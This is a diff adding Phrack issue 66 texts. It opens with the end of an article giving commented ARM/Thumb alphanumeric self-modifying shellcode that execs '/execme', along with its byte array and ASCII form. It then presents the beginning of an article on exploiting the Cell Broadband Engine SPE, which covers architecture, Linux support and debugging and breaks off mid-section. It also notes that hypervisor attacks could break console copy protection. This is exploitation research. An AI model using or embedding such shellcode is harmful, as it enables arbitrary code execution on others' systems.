+    SUBPL    r3, r1, #56
+
+    # we can't load directly from
+    # PC so we must get PC into r3
+    # we do this by subtracting 48 
+    # from PC
+    SUBMI    r3, pc, #48
+    SUBPL    r3, pc, #48
+
+    # load 56 into r3
+    LDRPLB   r3, [r3, #-48]
+    LDRMIB   r3, [r3, #-48]
+
+    # Set r5 to -1
+    # update the flags: result is negative
+    # so we know we need MI from now on
+    SUBMIS   r5, r3, #57
+    SUBPLS   r5, r3, #57
+
+    # r7 to stackpointer
+    SUBMI    r7, SP, #48
+    # Set r3 to 0
+    # set positive flag
+    SUBMIS   r3, r3, #56
+    # set r4 to 0
+    SUBPL    r4, r3, r3, ROR #2
+    # Set r6 to 0
+    SUBPL    r6, r4, r4, ROR #2
+
+    # store registers to stack
+    STMPLFD  r7, {r0, r4, r5, r6, r8, lr}^
+
+    # r5 to -121
+    SUBPL    r5, r4, #121
+
+    # copy PC to r6
+    SUBPL    r6, PC, r5, ROR #2
+
+    SUBPL    r6, r6, r5, ROR #2
+    SUBPL    r6, r6, r5, ROR #2
+    SUBPL    r6, r6, r5, ROR #2
+    SUBPL    r6, r6, r5, ROR #2
+    SUBPL    r6, r6, r5, ROR #2
+    SUBPL    r6, r6, r5, ROR #2
+
+    # write 0 to SWI 0x414141
+    # becomes: SWI 0x410041
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    STRPLB   r3, [r6, #-100]
+
+    # put 56 back into r3
+    # we are positive after this
+    EORPLS   r3, r3, #56
+
+    SUBPL    r7, r3, #57
+
+    # write 9F to SWI 0x410041
+    # becomes SWI 0x9F0041
+    # we are negative after this
+    EORPLS   r5, r7, #80
+    # negative
+    EORMIS   r5, r5, #48
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    STRMIB   r5, [r6, #-99]
+
+    # write 2 to SWI 0x9F0041
+    # becomes SWI 0x9F0002
+    SUBMI r5, r3, #54 
+    STRMIB   r5, [r6, #-101]
+
+    # write 0x16 to 0x41303030
+    # becomes 0x41303016
+    # positive
+    EORMIS   r5, r3, #66
+    EORPLS   r5, r5, #108
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    STRPLB   r5, [r6, #-89]
+
+    # write 2F to 0x41303016
+    # becomes 0x412F3016
+    EORPLS   r5, r3, #86
+    EORPLS   r5, r5, #65
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    STRPLB   r5, [r6, #-87]
+
+    # write FF to 0x412FFF16
+    # becomes 0x412FFF16 (BXPL r6)
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    STRPLB   r7, [r6, #-88]
+
+    # r7 = -1
+    # set r3 to  -121
+    SUBPL    r3, r7, #120
+    #
+    SUBPL    r6, r6, r3, ROR #2
+
+    # write DF for swi to 0x3030
+    # becomes 0xDF30 (SWI 48)
+    # becomes negative
+    EORPLS   r5, r7, #97
+    EORMIS   r5, r5, #65
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    STRMIB   r5, [r6, #-73]
+
+    # Set positive flag
+    EORMIS   r7, r4, #56
+
+    # load arguments for SWI
+    # r0 = 0, r1 = -1, r2 = 0
+    SUBPL    r5, SP, #48
+    # We use LDMPLFA, because it's one of the few instructions
+    # we can use to write to the registers R0 to R2.
+    # Other instructions generate non-alphanumeric characters
+    LDMPLFA  r5!, {r0, r1, r2, r6, r8, lr}
+
+    # Set r7 to -1
+    # Negative after this
+    SUBPLS   r7, r7, #57
+
+    # This will become: 
+    # SWIMI 0x9f0002    
+    SWIMI    0x414141
+
+    # Set positive flag again
+    EORMIS   r5, r4, #56
+
+    # set thumb mode
+    SUBPL    r6, pc, r7, ROR #2
+    
+    # this should be BXPL r6
+    # but in hex that's
+    # 0x51 0x2f 0xff 0x16, so we 
+    # overwrite the 0x30 above
+    .byte    0x30,0x30,0x30,0x51
+
+    .THUMB
+    .ALIGN 2
+    # We assume r2 is 0 before 
+    # entering Thumb mode
+
+    # copy pc to r0
+    mov    r0, pc
+
+    # OFFSET USED HERE
+    # IF CODE CHANGES, CHANGE OFFSET
+    # misalign r0 to address of 1execme2 - 47
+    # we will write to r0+47 and r0+54
+    # (beginning of the string)
+    add    r0, #100
+    sub    r0, #105
+
+    # set r1 to 0
+    mul    r1, r2
+    # set r1 tp 47
+    add    r1, #97
+    sub    r1, #50
+    # store r1 ('/') at r0+47
+    # string becomes /execme2
+    strb   r1, [r0, r1]
+
+    # set r1 to 0
+    mul    r1, r2
+    # set r1 to 54
+    add    r1, #54
+    # store 0 at r0+54
+    # string becomes /execme\0
+    strb   r2, [r0, r1]
+
+    # set r1 to 0
+    mul    r1, r2
+    # set r1 to -1
+    add    r1, #48
+    sub    r1, #49
+    # set r7 to 1
+    neg    r7, r1
+
+    # set r1 to 0
+    mul    r1, r2
+    # set r1 to 11 (0xb), 
+    # the exec system call code
+    add    r1, #65
+    sub    r1, #54
+    # our systemcall code must be in r7
+    # r7 = 1, r1 contains the code
+    mul    r7, r1
+
+    # set r1 to 0 (first parameter of execve)
+    mul    r1, r2
+
+    # set r0 to beginning of the string
+    add    r0, #97
+    sub    r0, #50
+
+    # This wil become: swi  48
+    .byte  0x30,0x30 
+    # This is a nop used for 
+    # alignment
+    add    r7, #50
+    # our command
+    .ascii "1execme2"
+    # nops used for alignment
+    add    r7, #50
+    add    r7, #50
+
+
+----[ A.2 Resulting Bytes
+
+char shellcode[] =    "\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41\x52\x38\x30\x41"
+  "\x52\x30\x30\x4f\x42\x30\x30\x4f\x52\x30\x30\x53\x55\x30\x30\x53"
+  "\x45\x39\x50\x53\x42\x39\x50\x53\x52\x30\x70\x4d\x42\x38\x30\x53"
+  "\x42\x63\x41\x43\x50\x64\x61\x44\x50\x71\x41\x47\x59\x79\x50\x44"
+  "\x52\x65\x61\x4f\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46"
+  "\x50\x65\x61\x46\x50\x65\x61\x46\x50\x65\x61\x46\x50\x64\x30\x46"
+  "\x55\x38\x30\x33\x52\x39\x70\x43\x52\x50\x50\x37\x52\x30\x50\x35"
+  "\x42\x63\x50\x46\x45\x36\x50\x43\x42\x65\x50\x46\x45\x42\x50\x33"
+  "\x42\x6c\x50\x35\x52\x59\x50\x46\x55\x56\x50\x33\x52\x41\x50\x35"
+  "\x52\x57\x50\x46\x55\x58\x70\x46\x55\x78\x30\x47\x52\x63\x61\x46"
+  "\x50\x61\x50\x37\x52\x41\x50\x35\x42\x49\x50\x46\x45\x38\x70\x34"
+  "\x42\x30\x50\x4d\x52\x47\x41\x35\x58\x39\x70\x57\x52\x41\x41\x41"
+  "\x4f\x38\x50\x34\x42\x67\x61\x4f\x50\x30\x30\x30\x51\x78\x46\x64"
+  "\x30\x69\x38\x51\x43\x61\x31\x32\x39\x41\x54\x51\x43\x36\x31\x42"
+  "\x54\x51\x43\x30\x31\x31\x39\x4f\x42\x51\x43\x41\x31\x36\x39\x4f"
+  "\x43\x51\x43\x61\x30\x32\x38\x30\x30\x32\x37\x31\x65\x78\x65\x63"
+  "\x6d\x65\x32\x32\x37\x32\x37";
+
+
+80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR80AR
+80AR80AR80AR80AR80AR80AR80AR80AR80AR00OB00OR00SU00SE9PSB9PSR0pMB80SBcACP
+daDPqAGYyPDReaOPeaFPeaFPeaFPeaFPeaFPeaFPd0FU803R9pCRPP7R0P5BcPFE6PCBePFE
+BP3BlP5RYPFUVP3RAP5RWPFUXpFUx0GRcaFPaP7RAP5BIPFE8p4B0PMRGA5X9pWRAAAO8P4B
+gaOP000QxFd0i8QCa129ATQC61BTQC0119OBQCA169OCQCa02800271execme22727
+
+--------[ EOF
diff --git a/phrack66/13.txt b/phrack66/13.txt
new file mode 100644
index 0000000..bf23d70
--- /dev/null
+++ b/phrack66/13.txt
@@ -0,0 +1,1592 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0d, Issue 0x42, Phile #0x0D of 0x11
+
+|=----------------------------------------------------------------------=|
+|=---------=[ Hacking the Cell Broadband Engine Architecture ]=---------=|
+|=-------------------=[ SPE software exploitation ]=--------------------=|
+|=----------------------------------------------------------------------=|
+|=--------------=[ By BSDaemon                              ]=----------=|
+|=--------------=[ <bsdaemon *noSPAM* risesecurity_org>     ]=----------=|
+|=----------------------------------------------------------------------=|
+
+					"There are two ways of
+					constructing a software design.
+					One way is to make it so simple
+					that there are obviously no
+					deficiencies.  And the other way
+					is to make it so complicated that
+					there are no obvious deficiencies"
+						- C.A.R. Hoare
+
+------[  Index
+
+  1 - Introduction
+    1.1 - Paper structure
+
+  2 - Cell Broadband Engine Architecture
+    2.1 - What is Cell
+    2.2 - Cell History
+	2.2.1 - Problems it solves
+	2.2.2 - Basic Design Concept
+	2.2.3 - Architecture Components
+	2.2.4 - Processor Components
+    2.3 - Debugging Cell
+    	2.3.1 - Linux on Cell
+	2.3.2 - Extensions to Linux
+		2.3.2.1 - User-mode
+		2.3.2.2 - Kernel-mode
+	2.3.3 - Debugging the SPE
+    2.4 - Software Development for Linux on Cell
+	2.4.1 - PPE/SPE hello world
+	2.4.2 - Standard Library Calls from SPE
+	2.4.3 - Communication Mechanisms 
+	2.4.4 - Memory Flow Control (MFC) Commands
+	2.4.5 - Direct Memory Access (DMA) Commands
+		2.4.5.1 - Get/Put Commands
+		2.4.5.2 - Resources
+		2.4.5.3 - SPE 2 SPE Communication
+
+  3 - Exploiting Software Vulnerabilities on Cell SPE
+    3.1 - Memory Overflows
+        3.1.1 - SPE memory layout
+        3.1.2 - SPE assembly basics
+		3.1.2.1 - Registers
+		3.1.2.2 - Local Storage Addressing Mode
+		3.1.2.3 - External Devices
+		3.1.2.4 - Instruction Set
+	3.1.3 - Exploiting software vulnerabilities in SPE
+		3.1.3.1 - Avoiding Null Bytes
+	3.1.4 - Finding software vulnerabilities on SPE
+
+  4 - Future and other uses
+
+  5 - Acknowledgements
+
+  6 - References
+
+  7 - Notes on SDK/Simulator Environment
+
+  8 - Sources 
+
+
+------[ 1 - Introduction
+
+This article is all about Cell Broadband Architecture Engine [1], a new
+hardware designed by a joint between Sony [2], Toshiba [3] and IBM [4].
+
+As so, lots of architecture details will be explained, and also many
+development differences for this platform.
+
+The biggest differentiator between this article and others released about
+this subject, is the focus on the architecture exploitation and not the
+use of the powerful processor resources to break code [5] and of course,
+the focus in the differentiators of the architecture, which means the SPU
+(synergestic processor unit) and not in the core (PPU - power processor
+unit) [6], since the core is a small-modified power processor (which
+means, all shellcodes for Linux on Power will also works for the core and
+there is just small differences in the code allocation and stuffs like
+that).
+
+It's important to mention that everything about Cell tries to focus in the
+Playstation3 hardware, since it's cheap and widely deployed, but there is
+also big machines made with this processor [7], including the #1 in the
+list of supercomputers [8].
+
+
+
+---[ 1.1 - Paper structure
+
+The idea of this paper is to complete the studies about Cell, putting all
+the information needed to do security research, focused in software
+exploitation for this architecture together.
+
+For that, the paper have been structured in two important portions:
+	
+Chapter 2 will be all about the Cell Architecture and how to develop for
+this architecture.  It includes many samples and explains the
+modifications done to Linux in order to get the best from this
+architecture.  Also, it gives the knowledge needed in order to go further
+in software exploitation for this arch.  Chapter 3 is focused in the
+exploitation of the SPU processor, showing the simple memory layout it has
+and how to write a shellcode for the purpose of gaining control over an
+application running inside the SPU.
+
+
+------[ 2 - Cell Broadband Engine Architecture
+
+From the IBM Research [9]: "The Cell Architecture grew from a challenge
+posed by Sony and Toshiba to provide power-efficient and cost-effective
+high-performance processing for a wide range of applications, including
+the most demanding consumer appliance: game consoles. Cell - also known as
+the Cell Broadband Engine Architecture (CBEA) - is an innovative solution
+whose design was based on the analysis of a broad range of workloads in
+areas such as cryptography, graphics transform and lighting, physics,
+fast-Fourier transforms (FFT), matrix operations, and scientific
+workloads. As an example of innovation that ensures the clients' success,
+a team from IBM Research joined forces with teams from IBM Systems
+Technology Group, Sony and Toshiba, to lead the development of a novel
+architecture that represents a breakthrough in performance for consumer
+applications. IBM Research participated throughout the entire development
+of the architecture, its implementation and its software enablement,
+ensuring the timely and efficient application of novel ideas and
+technology into a product that solves real challenges."
+
+It's impossible to not get excited with this.  A so 'powerful' and
+versatile architecture, completely different from what we usually seen is
+an amazing stuff to research for software vulnerabilities.  Also, since
+it's supposed to be widely deployed, there will be an infinite number of
+new vulnerabilities coming on in the near future.  I wanted to exploit
+those vulnerabilities.
+
+
+---[ 2.1 - What is Cell
+
+As must be already clear to the reader, I'm not talking about phones here.
+Cell is a new architecture, which cames to solve some of the actual
+problems in the computer industry.
+
+It's compatible with a well-known architecture, which are the Power
+Architecture, keeping most of it's advantages and solving most of it's
+problems (if you cannot wait until know what problems, go to 2.2.1
+section).
+
+
+---[ 2.2 - Cell History
+
+The focus of this section is just to give a timeline vision for the
+reader, not been detailed at all.
+
+The architecture was born from a joint between IBM, Sony and Toshiba,
+formed in 2000. 
+
+They opened a design center in March 2001, based in Austin, Texas (USA).
+
+In the spring of 2004, a single Cell BE became operational.  In the summer
+of the same year, a 2-way SMP version was released.
+
+The first technical disclosures came just in February 2005, with the
+simulator [10] and open-source SDK [11] (more on that later) been released
+in November of the same year.  In the same month, Mercury started to sell
+Cell (yeah, sell Cell sounds funny) machines.
+
+Cell Blades was announced by IBM in February of 2006.  The SDK 1.1 was
+released in July of the same year, with many improvements.  The latest
+version is 3.1.
+
+
+---[ 2.2.1 - Problems it solves
+
+The computer technology have been evolving along the years, but always
+suffering and trying to avoid some barriers.
+
+Those barriers are physically impossible to be bypassed and that's why the
+processor clock stopped to grow and multi-core architectures been focused.
+
+Basically we have three big walls (barriers) to the speedy grow:
+	- Power wall
+	It's related to the CMOS technology limits and the hard limit to 
+	the acceptable system power
+
+	- Memory wall
+	Many comparisons and improvements trying to avoid the DRAM latency
+	when compared to the processor frequency
+
+	- Frequency wall
+	Diminishing return from deeper pipelines
+
+For a new architecture to work and be widely deployed, it was also
+important to keep the investments in software development.
+
+Cell accomplish that being compatible with the 64 bits Power Architecture,
+and attacks the walls in the following ways:
+
+	- Non-homogeneous coherent multi-processor and high design 
+	  frequency at a low operating voltage with advanced power
+	  management attacks the 'power wall'.
+	- Streaming DMA architecture and three-level memory model (main 
+	  storage, local storage and register files) attacks the 'memory 
+	  wall'.
+	- Non-homogeneous coherent multi-processor, highly-optimized
+implementation and large shared register files with software controlled
+branching to allow deeper pipelines attacks the 'frequency wall'.
+
+It have been developed to support any OS, which means it supports
+real-time operating system as well non-real time operating systems.
+
+---[ 2.2.2 - Basic Design Concept
+
+The basic concept behind cell is it's asymmetric multi-core design.  That
+permits a powerful design, but of course requires specific-developed
+applications to achieve the most of the architecture.
+
+Knowing that, becomes clear that the understanding of the new component,
+which is called SPU (synergistic processor unit) or SPE (synergistic
+processor element) proofs to be essential - see the next section for a
+better understanding of the differences between SPU and SPE.
+
+
+---[ 2.2.3 - Architecture Components
+
+In cell what we have is a core processor, called Power Processor Element
+(PPE) which control tasks and synergistic processor elements (SPEs) for
+data-intensive processing.
+
+The SPE consists of the synergistic processor unit (SPU), which are a
+processor itself and the memory flow control (MFC), responsible for the
+data movements and synchronization, as well for the interface with the
+high-performance element interconnect bus (EIB).
+
+Communications with the EIB are done in a 16B/cycle, which means that each
+SPU is interconnected at that speedy with the bus, which supports
+96B/cycle.
+
+Refer to the picture architecture-components.jpg in the directory images
+of the attached file for a visual of the above explanation.
+
+---[ 2.2.4 - Processor Components
+
+As said, the Power Processor Element (PPE) is the core processor which
+control tasks (scheduling).  It is a general purpose 64 bit RISC processor
+(Power architecture).
+
+It's 2-way hardware multithreaded, with a L1: 32KB I and D caches and L2:
+512KB cache.
+
+Has support for real-time operations, like locking the L2 cache and the
+TLB (also it supports managed TLB by hardware and software).  It has
+bandwidth and resource reservation and mediated interrupts.
+
+It's also connected to the EIB using a 16B/cycle channel (figure 
+processor-components.jpg).
+
+The EIB itself supports four 16 bytes data rings with simultaneous
+transfers per ring (it will be clarified later).
+
+This bus supports over 100 simultaneous transactions achieving in each bus
+data port more than 25.6 Gbytes/sec in each direction.
+
+On the other side, the synergistic processor element is a simple RISC
+user-mode architecture supporting dual-issue VMX-like, graphics SP-float
+and IEEE DP-float.
+
+Important to note that the SPE itself has dedicated resources: unified 128
+x 128 bit register files and 256KB local storage.  Each SPE has a
+dedicated DMA engine, supporting 16 requests.
+
+The memory management on this architecture simplified it's use, with the
+local storage of the SPE being aliased into the PPE system memory (figure
+processor-components2.jpg).
+
+MFC in the SPE acts as the MMU providing controls over the SPE DMA access
+and it's compatible with the PowerPC Virtual Memory layout and is software
+controllable using PPE MMIO.
+
+DMA access supports 1,2,4,8...n*16 bytes transfer, with a maximum of 16 KB
+for I/O, and with two different queues for DMA commands:  Proxy & SPU
+(more on this later).
+
+EIB is also connected in a broadband interface controller (BIC).  The
+purpose of this controller is to provide external connectivity for
+devices.  It supports two configurable interfaces (60 GB/s) with a
+configurable number of bytes, coherent (BIF) and/or I/O (IOIFx) protocols,
+using two virtual channels per interface, and multiple system
+configurations.
+
+The memory interface controller (MIC) is also connected to the EIB and is
+a Dual XDR controller (25.6 GB/s) with ECC and suspended DRAM support
+(figure processor-components3.jpg).
+
+Still are missing two more components:  The internal interrupt controller
+(IIC) and the I/O Bus Master Translation (IOT) (figure
+processor-components4.jpg).
+
+The IIC handles the SPE interrupts as well as the external interrupts and
+interrupts comming from the coherent interconnect and the IOIF0 and IOIF1.
+It is also responsible for the interrupt priority level control and for
+the interrupt generation ports for IPI.  Note that the IIC is duplicated
+for each PPE hardware thread.
+
+IOT translates bus addresses to system real addresses, supporting two
+level translations:
+	- I/O segments (256 MB)
+	- I/O pages (4K, 64K, 1M, 16M bytes)
+
+Interesting is the resource of I/O device identifier per page for LPAR use
+(blades) and IOST/IOPT caches managed by software and hardware.
+
+
+---[ 2.3 - Debugging Cell
+
+As the bus is a high-speedy circuit, it's really difficult to debug the
+architecture and better seen what is going on.
+
+For that, and also to made it easy to develop software for Cell, IBM
+Research developed a Cell simulator [10] in which you may run Linux and
+install the software development kit [11].
+
+The IBM Linux Technology Center brazilian team developed a plugin for
+eclipse as an IDE for the debugger and SDK.  Putting it all together is
+possible to have the toolkit installed in a Linux machine, running the
+frontends for the simulator and for the SDK.  The debugging interface is
+much better using this frontends.  Anyway, it's important to notice that
+it's just a frontend for the normal and well know linux tools with
+extended support to Cell processor (GDB and GCC).
+
+---[ 2.3.1 - Linux on Cell
+
+Linux on cell is an open-source git branch and is provided in the PowerPC
+64 kernel line.
+
+It started in the 2.6.15 and is evolving to support many new features,
+like the scheduling improvements for the SPUs (actually it can be
+preempted, and my big friend Andre Detsch who reviewed this article was
+one of the biggest contributors to create an stable code here).
+
+On Linux it added heterogeneous lwp/thread model, with a new SPE thread
+model (really similar to the pthreads library as we will see later),
+supporting user-mode direct and indirect SPE access, full-preemptive SPE
+context management and for that, spe_ptrace() was create and it's support
+added to GDB, spe_schedule() for thread to physical spe assigment (it is
+not anymore FIFO - run until completion).
+
+As a note, the SPE threads shares it's address space with the parent PPE
+process (using DMA), demand paging for SPE access and shared hardware page
+table with PPE.
+
+An implementation detail is the PPE proxy thread allocated for each SPE to
+provide a single namespace for both PPE and SPE and assist in SPE
+initiated C99 and Posix library services.
+
+All the events, error and signal handling for SPEs are done by the parent
+PPE thread.
+
+The ELF objects for SPE are wrapped into PPE objects with an extended GLD.
+
+
+---[ 2.3.2 - Extensions to Linux
+
+Here I'll try to provide some details for Linux running under a Cell
+Hardware.  The base hardware used for this reference is a Playstation 3,
+which has 8 SPUs, but one is reserved with the purpose of redundancy and
+another one is used as hypervisor for a custom OS (in this case, Linux).
+
+All the details are valid for any Linux on Cell and we will provide an
+top-down view approach.
+
+---[ 2.3.2.1 - User-mode
+
+Cell supports both power 32 and 64 bits applications, as well as 32 and 64
+cell workloads.  It has different programming modes, like RPC, devices
+subsystems and direct/indirect access.
+
+As already said, it has heterogeneous threads:  single SPU, SPU groups and
+shared memory support.
+
+It runs over a SPE management runtime library, with 32 and 64 bits.  This
+library interacts with the SPUFS filesystem (/spu/thread#/) in the
+following ways:
+   * Open, close, read, write the files:
+	- mem
+	This file provides access to the local storage
+
+	- regs
+	Access to the 128 register of 128 bits each
+
+	- mbox
+	spe to ppe mailbox
+
+	- liox
+	spe to ppe interrupt mailbox
+
+	- xbox_stat
+	Get the mailbox status
+
+	- signal1
+	Signal notification acess
+
+	- signal2
+	Signal notification acess
+
+	- signalx_type
+	Signal type
+
+	- npc
+	Read/write SPE next program counter (for debugging)
+
+	- fpcr
+	SPE floating point control/status register	
+
+	- decr
+	SPE decrementer
+
+	- decr_status
+	SPE decrementer status
+
+	- spu_tag_mask
+	Access tag query mask
+
+	- event_mask
+	Access spe event mask
+
+	- srr0
+	Access spe state restore register 0
+
+
+   * open, close mmap the files:
+	- mem
+	Program State access of the Local Storage
+	
+	- signal1
+	Direct application access to signal 1
+
+	- signal2
+	Direct application access to signal 2
+
+	- cntl
+	Direct application access to SPE controls, DMA queues and
+	mailboxes
+
+The library also provides SPE task control system calls (to interact with
+the SPE system calls implemented in kernel-mode), which are:
+	- sys_spu_create_thread
+	Allocates a SPE task/context and creates a directory in SPUFS
+
+	- sys_spu_run
+	  Activates a SPU task/context on a physical SPE and
+	  blocks in the kernel as a proxy thread to handle the events
+	  already mentioned
+
+Some functions provided by the library are related to the management of
+the spe tasks, like spe create group, create thread, get/set affinity,
+get/set context, get event, get group, get ls, get ps area, get threads,
+get/set priority, get policy, set group defaults, group max, kill/wait,
+open/close image, write signal, read in_mbox, write out_mbox, read mbox
+status.
+
+
+Obviously the standard 32 and 64 bits powerpc ELF (binary) interpreters,
+it is provided a SPE object loader, responsible for understand the
+extension to the normal objects already mentioned and for initiate the
+loading of the SPE threads.
+
+Going down, we have the glibc and other GNU libraries, both supporting 32
+and 64 bits.
+
+
+---[ 2.3.2.2 - Kernel-mode
+
+The next layer is the normal system-call interface, where we have the SPU
+management framework (through special files in the spufs) and
+modifications in the exec* interface, in a 64bit kernel.
+
+This modification is done through a special misc format binary, called SPU
+object loader extension.  
+
+Of course there is other kernel extensions, the SPUFS filesystem, which
+provides the management interface and the SPU allocation, scheduling and
+dispatch.
+
+Also, we do have the Cell BE architecture specific code, supporting multi
+and large pages, SPE event & fault handling, IIC and IOMMU.
+
+Everything is controlled by a hypervisor, since Linux is what is called a
+custom OS when running in a Playstation3 hardware (the hypervisor is
+responsible for the protection of the 'secret key' of the hardware and
+knowing how to exploit SPU vulnerabilities plus some fuzzing on the
+hypervisor may be the needed knowledge to break the game protection copy
+in this hardware).
+
+
+---[ 2.3.3 - Debugging the SPE
+
+The SDK for Linux on Cell provides good resources for Debugging and better
+understanding of what is going on.
+
+It's important to note the environment variables that control the
+behaviour of the system.
+
+So, if you set the SPU_INFO, for example, the spe runtime library will
+print messages when loading a SPE ELF executable (see above).
+
+---------- begin output ----------
+	# export SPU_INFO=1
+	# ./test
+	Loading SPE program: ./test
+	SPU LS Entry Addr  : XXX
+---------- end   output ----------
+
+And it will also print messages before starting up a new SPE thread, like:
+
+---------- begin output ----------
+	Starting SPE thread 0x..., to attach debugger use: spu-gdb -p XXX
+---------- end   output ----------
+
+When planning to use the spu-gdb to debug a SPU thread, it's important to
+remember the SPU_DEBUG_START environment variable, which will include
+everything provided by the SPU_INFO and will stop the thread until a
+debugger is attached or a signal is received.
+
+Since each SPU register can hold multiple fixed (or floating) point values
+of different sizes, for GDB is provided a data structure that can be
+accessed with different formats.  So, specifying the field in the data
+structure, we can update it using different sizes as well:
+
+---------- begin output ----------
+(gdb) ptype $r70
+type = union __gdb_builtin_type_vec128 {
+	int128_t uint128;
+	float v4_float[4];
+	int32_t v4_int32[4];
+	int16_t v8_int16[8];
+	int8_t v16_int8[16];
+}
+
+(gdb) p $r70.uint128
+$1 = 0x00018ff000018ff000018ff000018ff0
+(gdb) set $r70.v4_int[2]=0xdeadbeef
+(gdb) p $r70.uint128
+$2 = 0x00018ff000018ff0deadbeef00018ff0
+---------- end   output ----------
+
+To permit you to better understand when the SPU code starts the execution
+and follow it gdb also included an interesting option:
+
+
+---------- begin output ----------
+(gdb) set spu stop-on-load
+(gdb) run
+...
+(gdb) info registers
+---------- end   output ----------
+
+Another important information for debugging your code is to understand the
+internal sizes and be prepared for overlapping.  Useful information can
+be get using the following fragment code inside your spu program (careful:
+It's not freeing the allocated memory).
+
+---   code   ---
+extern int _etext;
+extern int _edata;
+extern int _end;
+
+void meminfo(void)
+{
+	printf("\n&_etext: %p", &_etext);
+	printf("\n&_edata: %p", &_edata);
+	printf("\n&_end: %p", &_end);
+	printf("\nsbrk(0): %p", sbrk(0));
+	printf("\nmalloc(1024): %p", malloc(1024));
+	printf("\nsbrk(0): %p", sbrk(0));
+}
+--- end code ---
+
+And of course you can also play with the GCC and LD arguments to have more
+debugging info:
+
+---   code   ---
+# vi Makefile
+CFLAGS += -g
+LDFLAGS += -Wl,-Map,map_filename.map
+--- end code ---
+
+
+
+---[ 2.4 - Software Development for Linux on Cell
+
+In this chapter I will introduce the inners of the Cell development,
+giving the basic knowledge necessary to better understand the further
+chapters.
+
+---[ 2.4.1 - PPE/SPE hello world
+
+Every program in Cell that uses the SPEs needs to have at least two source
+codes.  One for the PPE and another one for the SPE.
+
+Following is a simple code to run on the SPE (it's also in the attached
+tar file :
+
+---   code   ---
+#include <stdio.h>
+
+int main(unsigned long long speid, unsigned long long argp, unsigned long long envp)
+{
+	printf("\nHello World!\n");
+	return 0;
+}
+--- end code ---
+
+The Makefile for this code will look like:
+
+
+---   code   ---
+PROGRAM_spu     = hello_spu
+LIBRARY_embed   = hello_spu.a
+IMPORTS 	= $(SDKLIB_spu)/libc.a
+include 	($TOP)/make.footer
+--- end code ---
+
+Of course it looks like any normal code.  The PPE as already explained is
+the responsible for the creation of the new thread and allocation in the
+SPE:
+
+---   code   ---
+#include <stdio.h>
+#include <libspe.h> 
+
+extern spe_program_handle_t hello_spu;
+
+int main(void)
+{
+	int speid, status;
+
+	speid=spe_create_thread(0, &hello_spu, NULL, NULL, -1, 0);
+	spe_wait(speid, &status, 1);
+	return 0;
+}
+--- end code ---
+
+With the following Makefile:
+
+---   code   ---
+DIRS 		= spu
+PROGRAM_ppu 	= hello_ppu
+IMPORTS 	= ../spu/hello_spu.a -lspe
+include $(TOP)/make.footer
+--- end code ---
+
+The reader will notice that the speid in the PPE program will be the same
+value as the speid in the main of the SPE.
+
+Also, the arguments passed to the spe_create_thread() are the ones
+received by the SPE program when running (argp and envp equals to NULL in
+our sample).
+
+Important to remember that when compiled this program will generate a
+binary in the spu directory, called hello_spu and another one in the root
+directory of this example called hello_ppu, which CONTAINS embedded the
+hello_spu.  
+
+
+---[ 2.4.2 - Standard Library Calls from SPE
+
+When the SPE program needs to use any standard library call, like for
+example, printf or exit, it has to call back to the PPE main thread.
+
+It uses a simple stop-and-signal assembly instruction with standardized
+arguments value (important to remember that since it's needed in
+shellcodes for SPE).
+
+That value is returned from the ioctl call and the user thread must react
+to that.  This means copying the arguments from the SPE Local Storage,
+executing the library call and then calling ioctl again.
+
+The instruction according to the manual:
+	"stop u14 - Stop and signal.  Execution is stopped, the current
+	address is written to the SPU NPC register, the value u14 is
+	written to the SPU status register, and an interrupt is sent to 
+	the PPU."
+
+This is a disassembly output of the hello_spu program:
+
+---------- begin output ----------
+# spu-gdb ./hello_spu 
+GNU gdb 6.3
+Copyright 2004 Free Software Foundation, Inc.
+GDB is free software, covered by the GNU General Public License, and you are
+welcome to change it and/or distribute copies of it under certain conditions.
+Type "show copying" to see the conditions.
+There is absolutely no warranty for GDB.  Type "show warranty" for details.
+This GDB was configured as "--host=powerpc64-unknown-linux-gnu --target=spu"...
+(gdb) disassemble main
+Dump of assembler code for function main:
+0x00000170 <main+0>:    ila     $3,0x340 <.rodata>
+0x00000174 <main+4>:    stqd    $0,16($1)
+0x00000178 <main+8>:    nop     $127
+0x0000017c <main+12>:   stqd    $1,-32($1)
+0x00000180 <main+16>:   ai      $1,$1,-32
+0x00000184 <main+20>:   brsl    $0,0x1a0 <puts> # 1a0
+0x00000188 <main+24>:   ai      $1,$1,32        # 20
+0x0000018c <main+28>:   fsmbi   $3,0
+0x00000190 <main+32>:   lqd     $0,16($1)
+0x00000194 <main+36>:   bi      $0
+0x00000198 <main+40>:   stop
+0x0000019c <main+44>:   stop
+End of assembler dump.
+(gdb)
+---------- end   output ----------
+
+
+---[ 2.4.3 - Communication Mechanisms
+
+The architecture offers three main communications mechanism:
+	- DMA 
+	  Used to move data and instructions between main storage and
+	  a local storage.  SPEs rely on asyncronous DMA transfers to hide
+	  memory latency and transfer overhead by moving information in
+	  parallel with SPU computation.
+
+	- Mailbox
+	  Used for control communications between a SPE and the
+	  PPE or other devices.  Mailboxes holds 32-bit messages.  Each
+	  SPE has two mailboxes for sending messages and one mailbox for
+	  receiving messages.
+
+	- Signal Notification
+	  Used for control communications from PPE or
+	  other devices.  Signal notification (also known as signalling)
+	  uses 32-bit registers that can be configured for
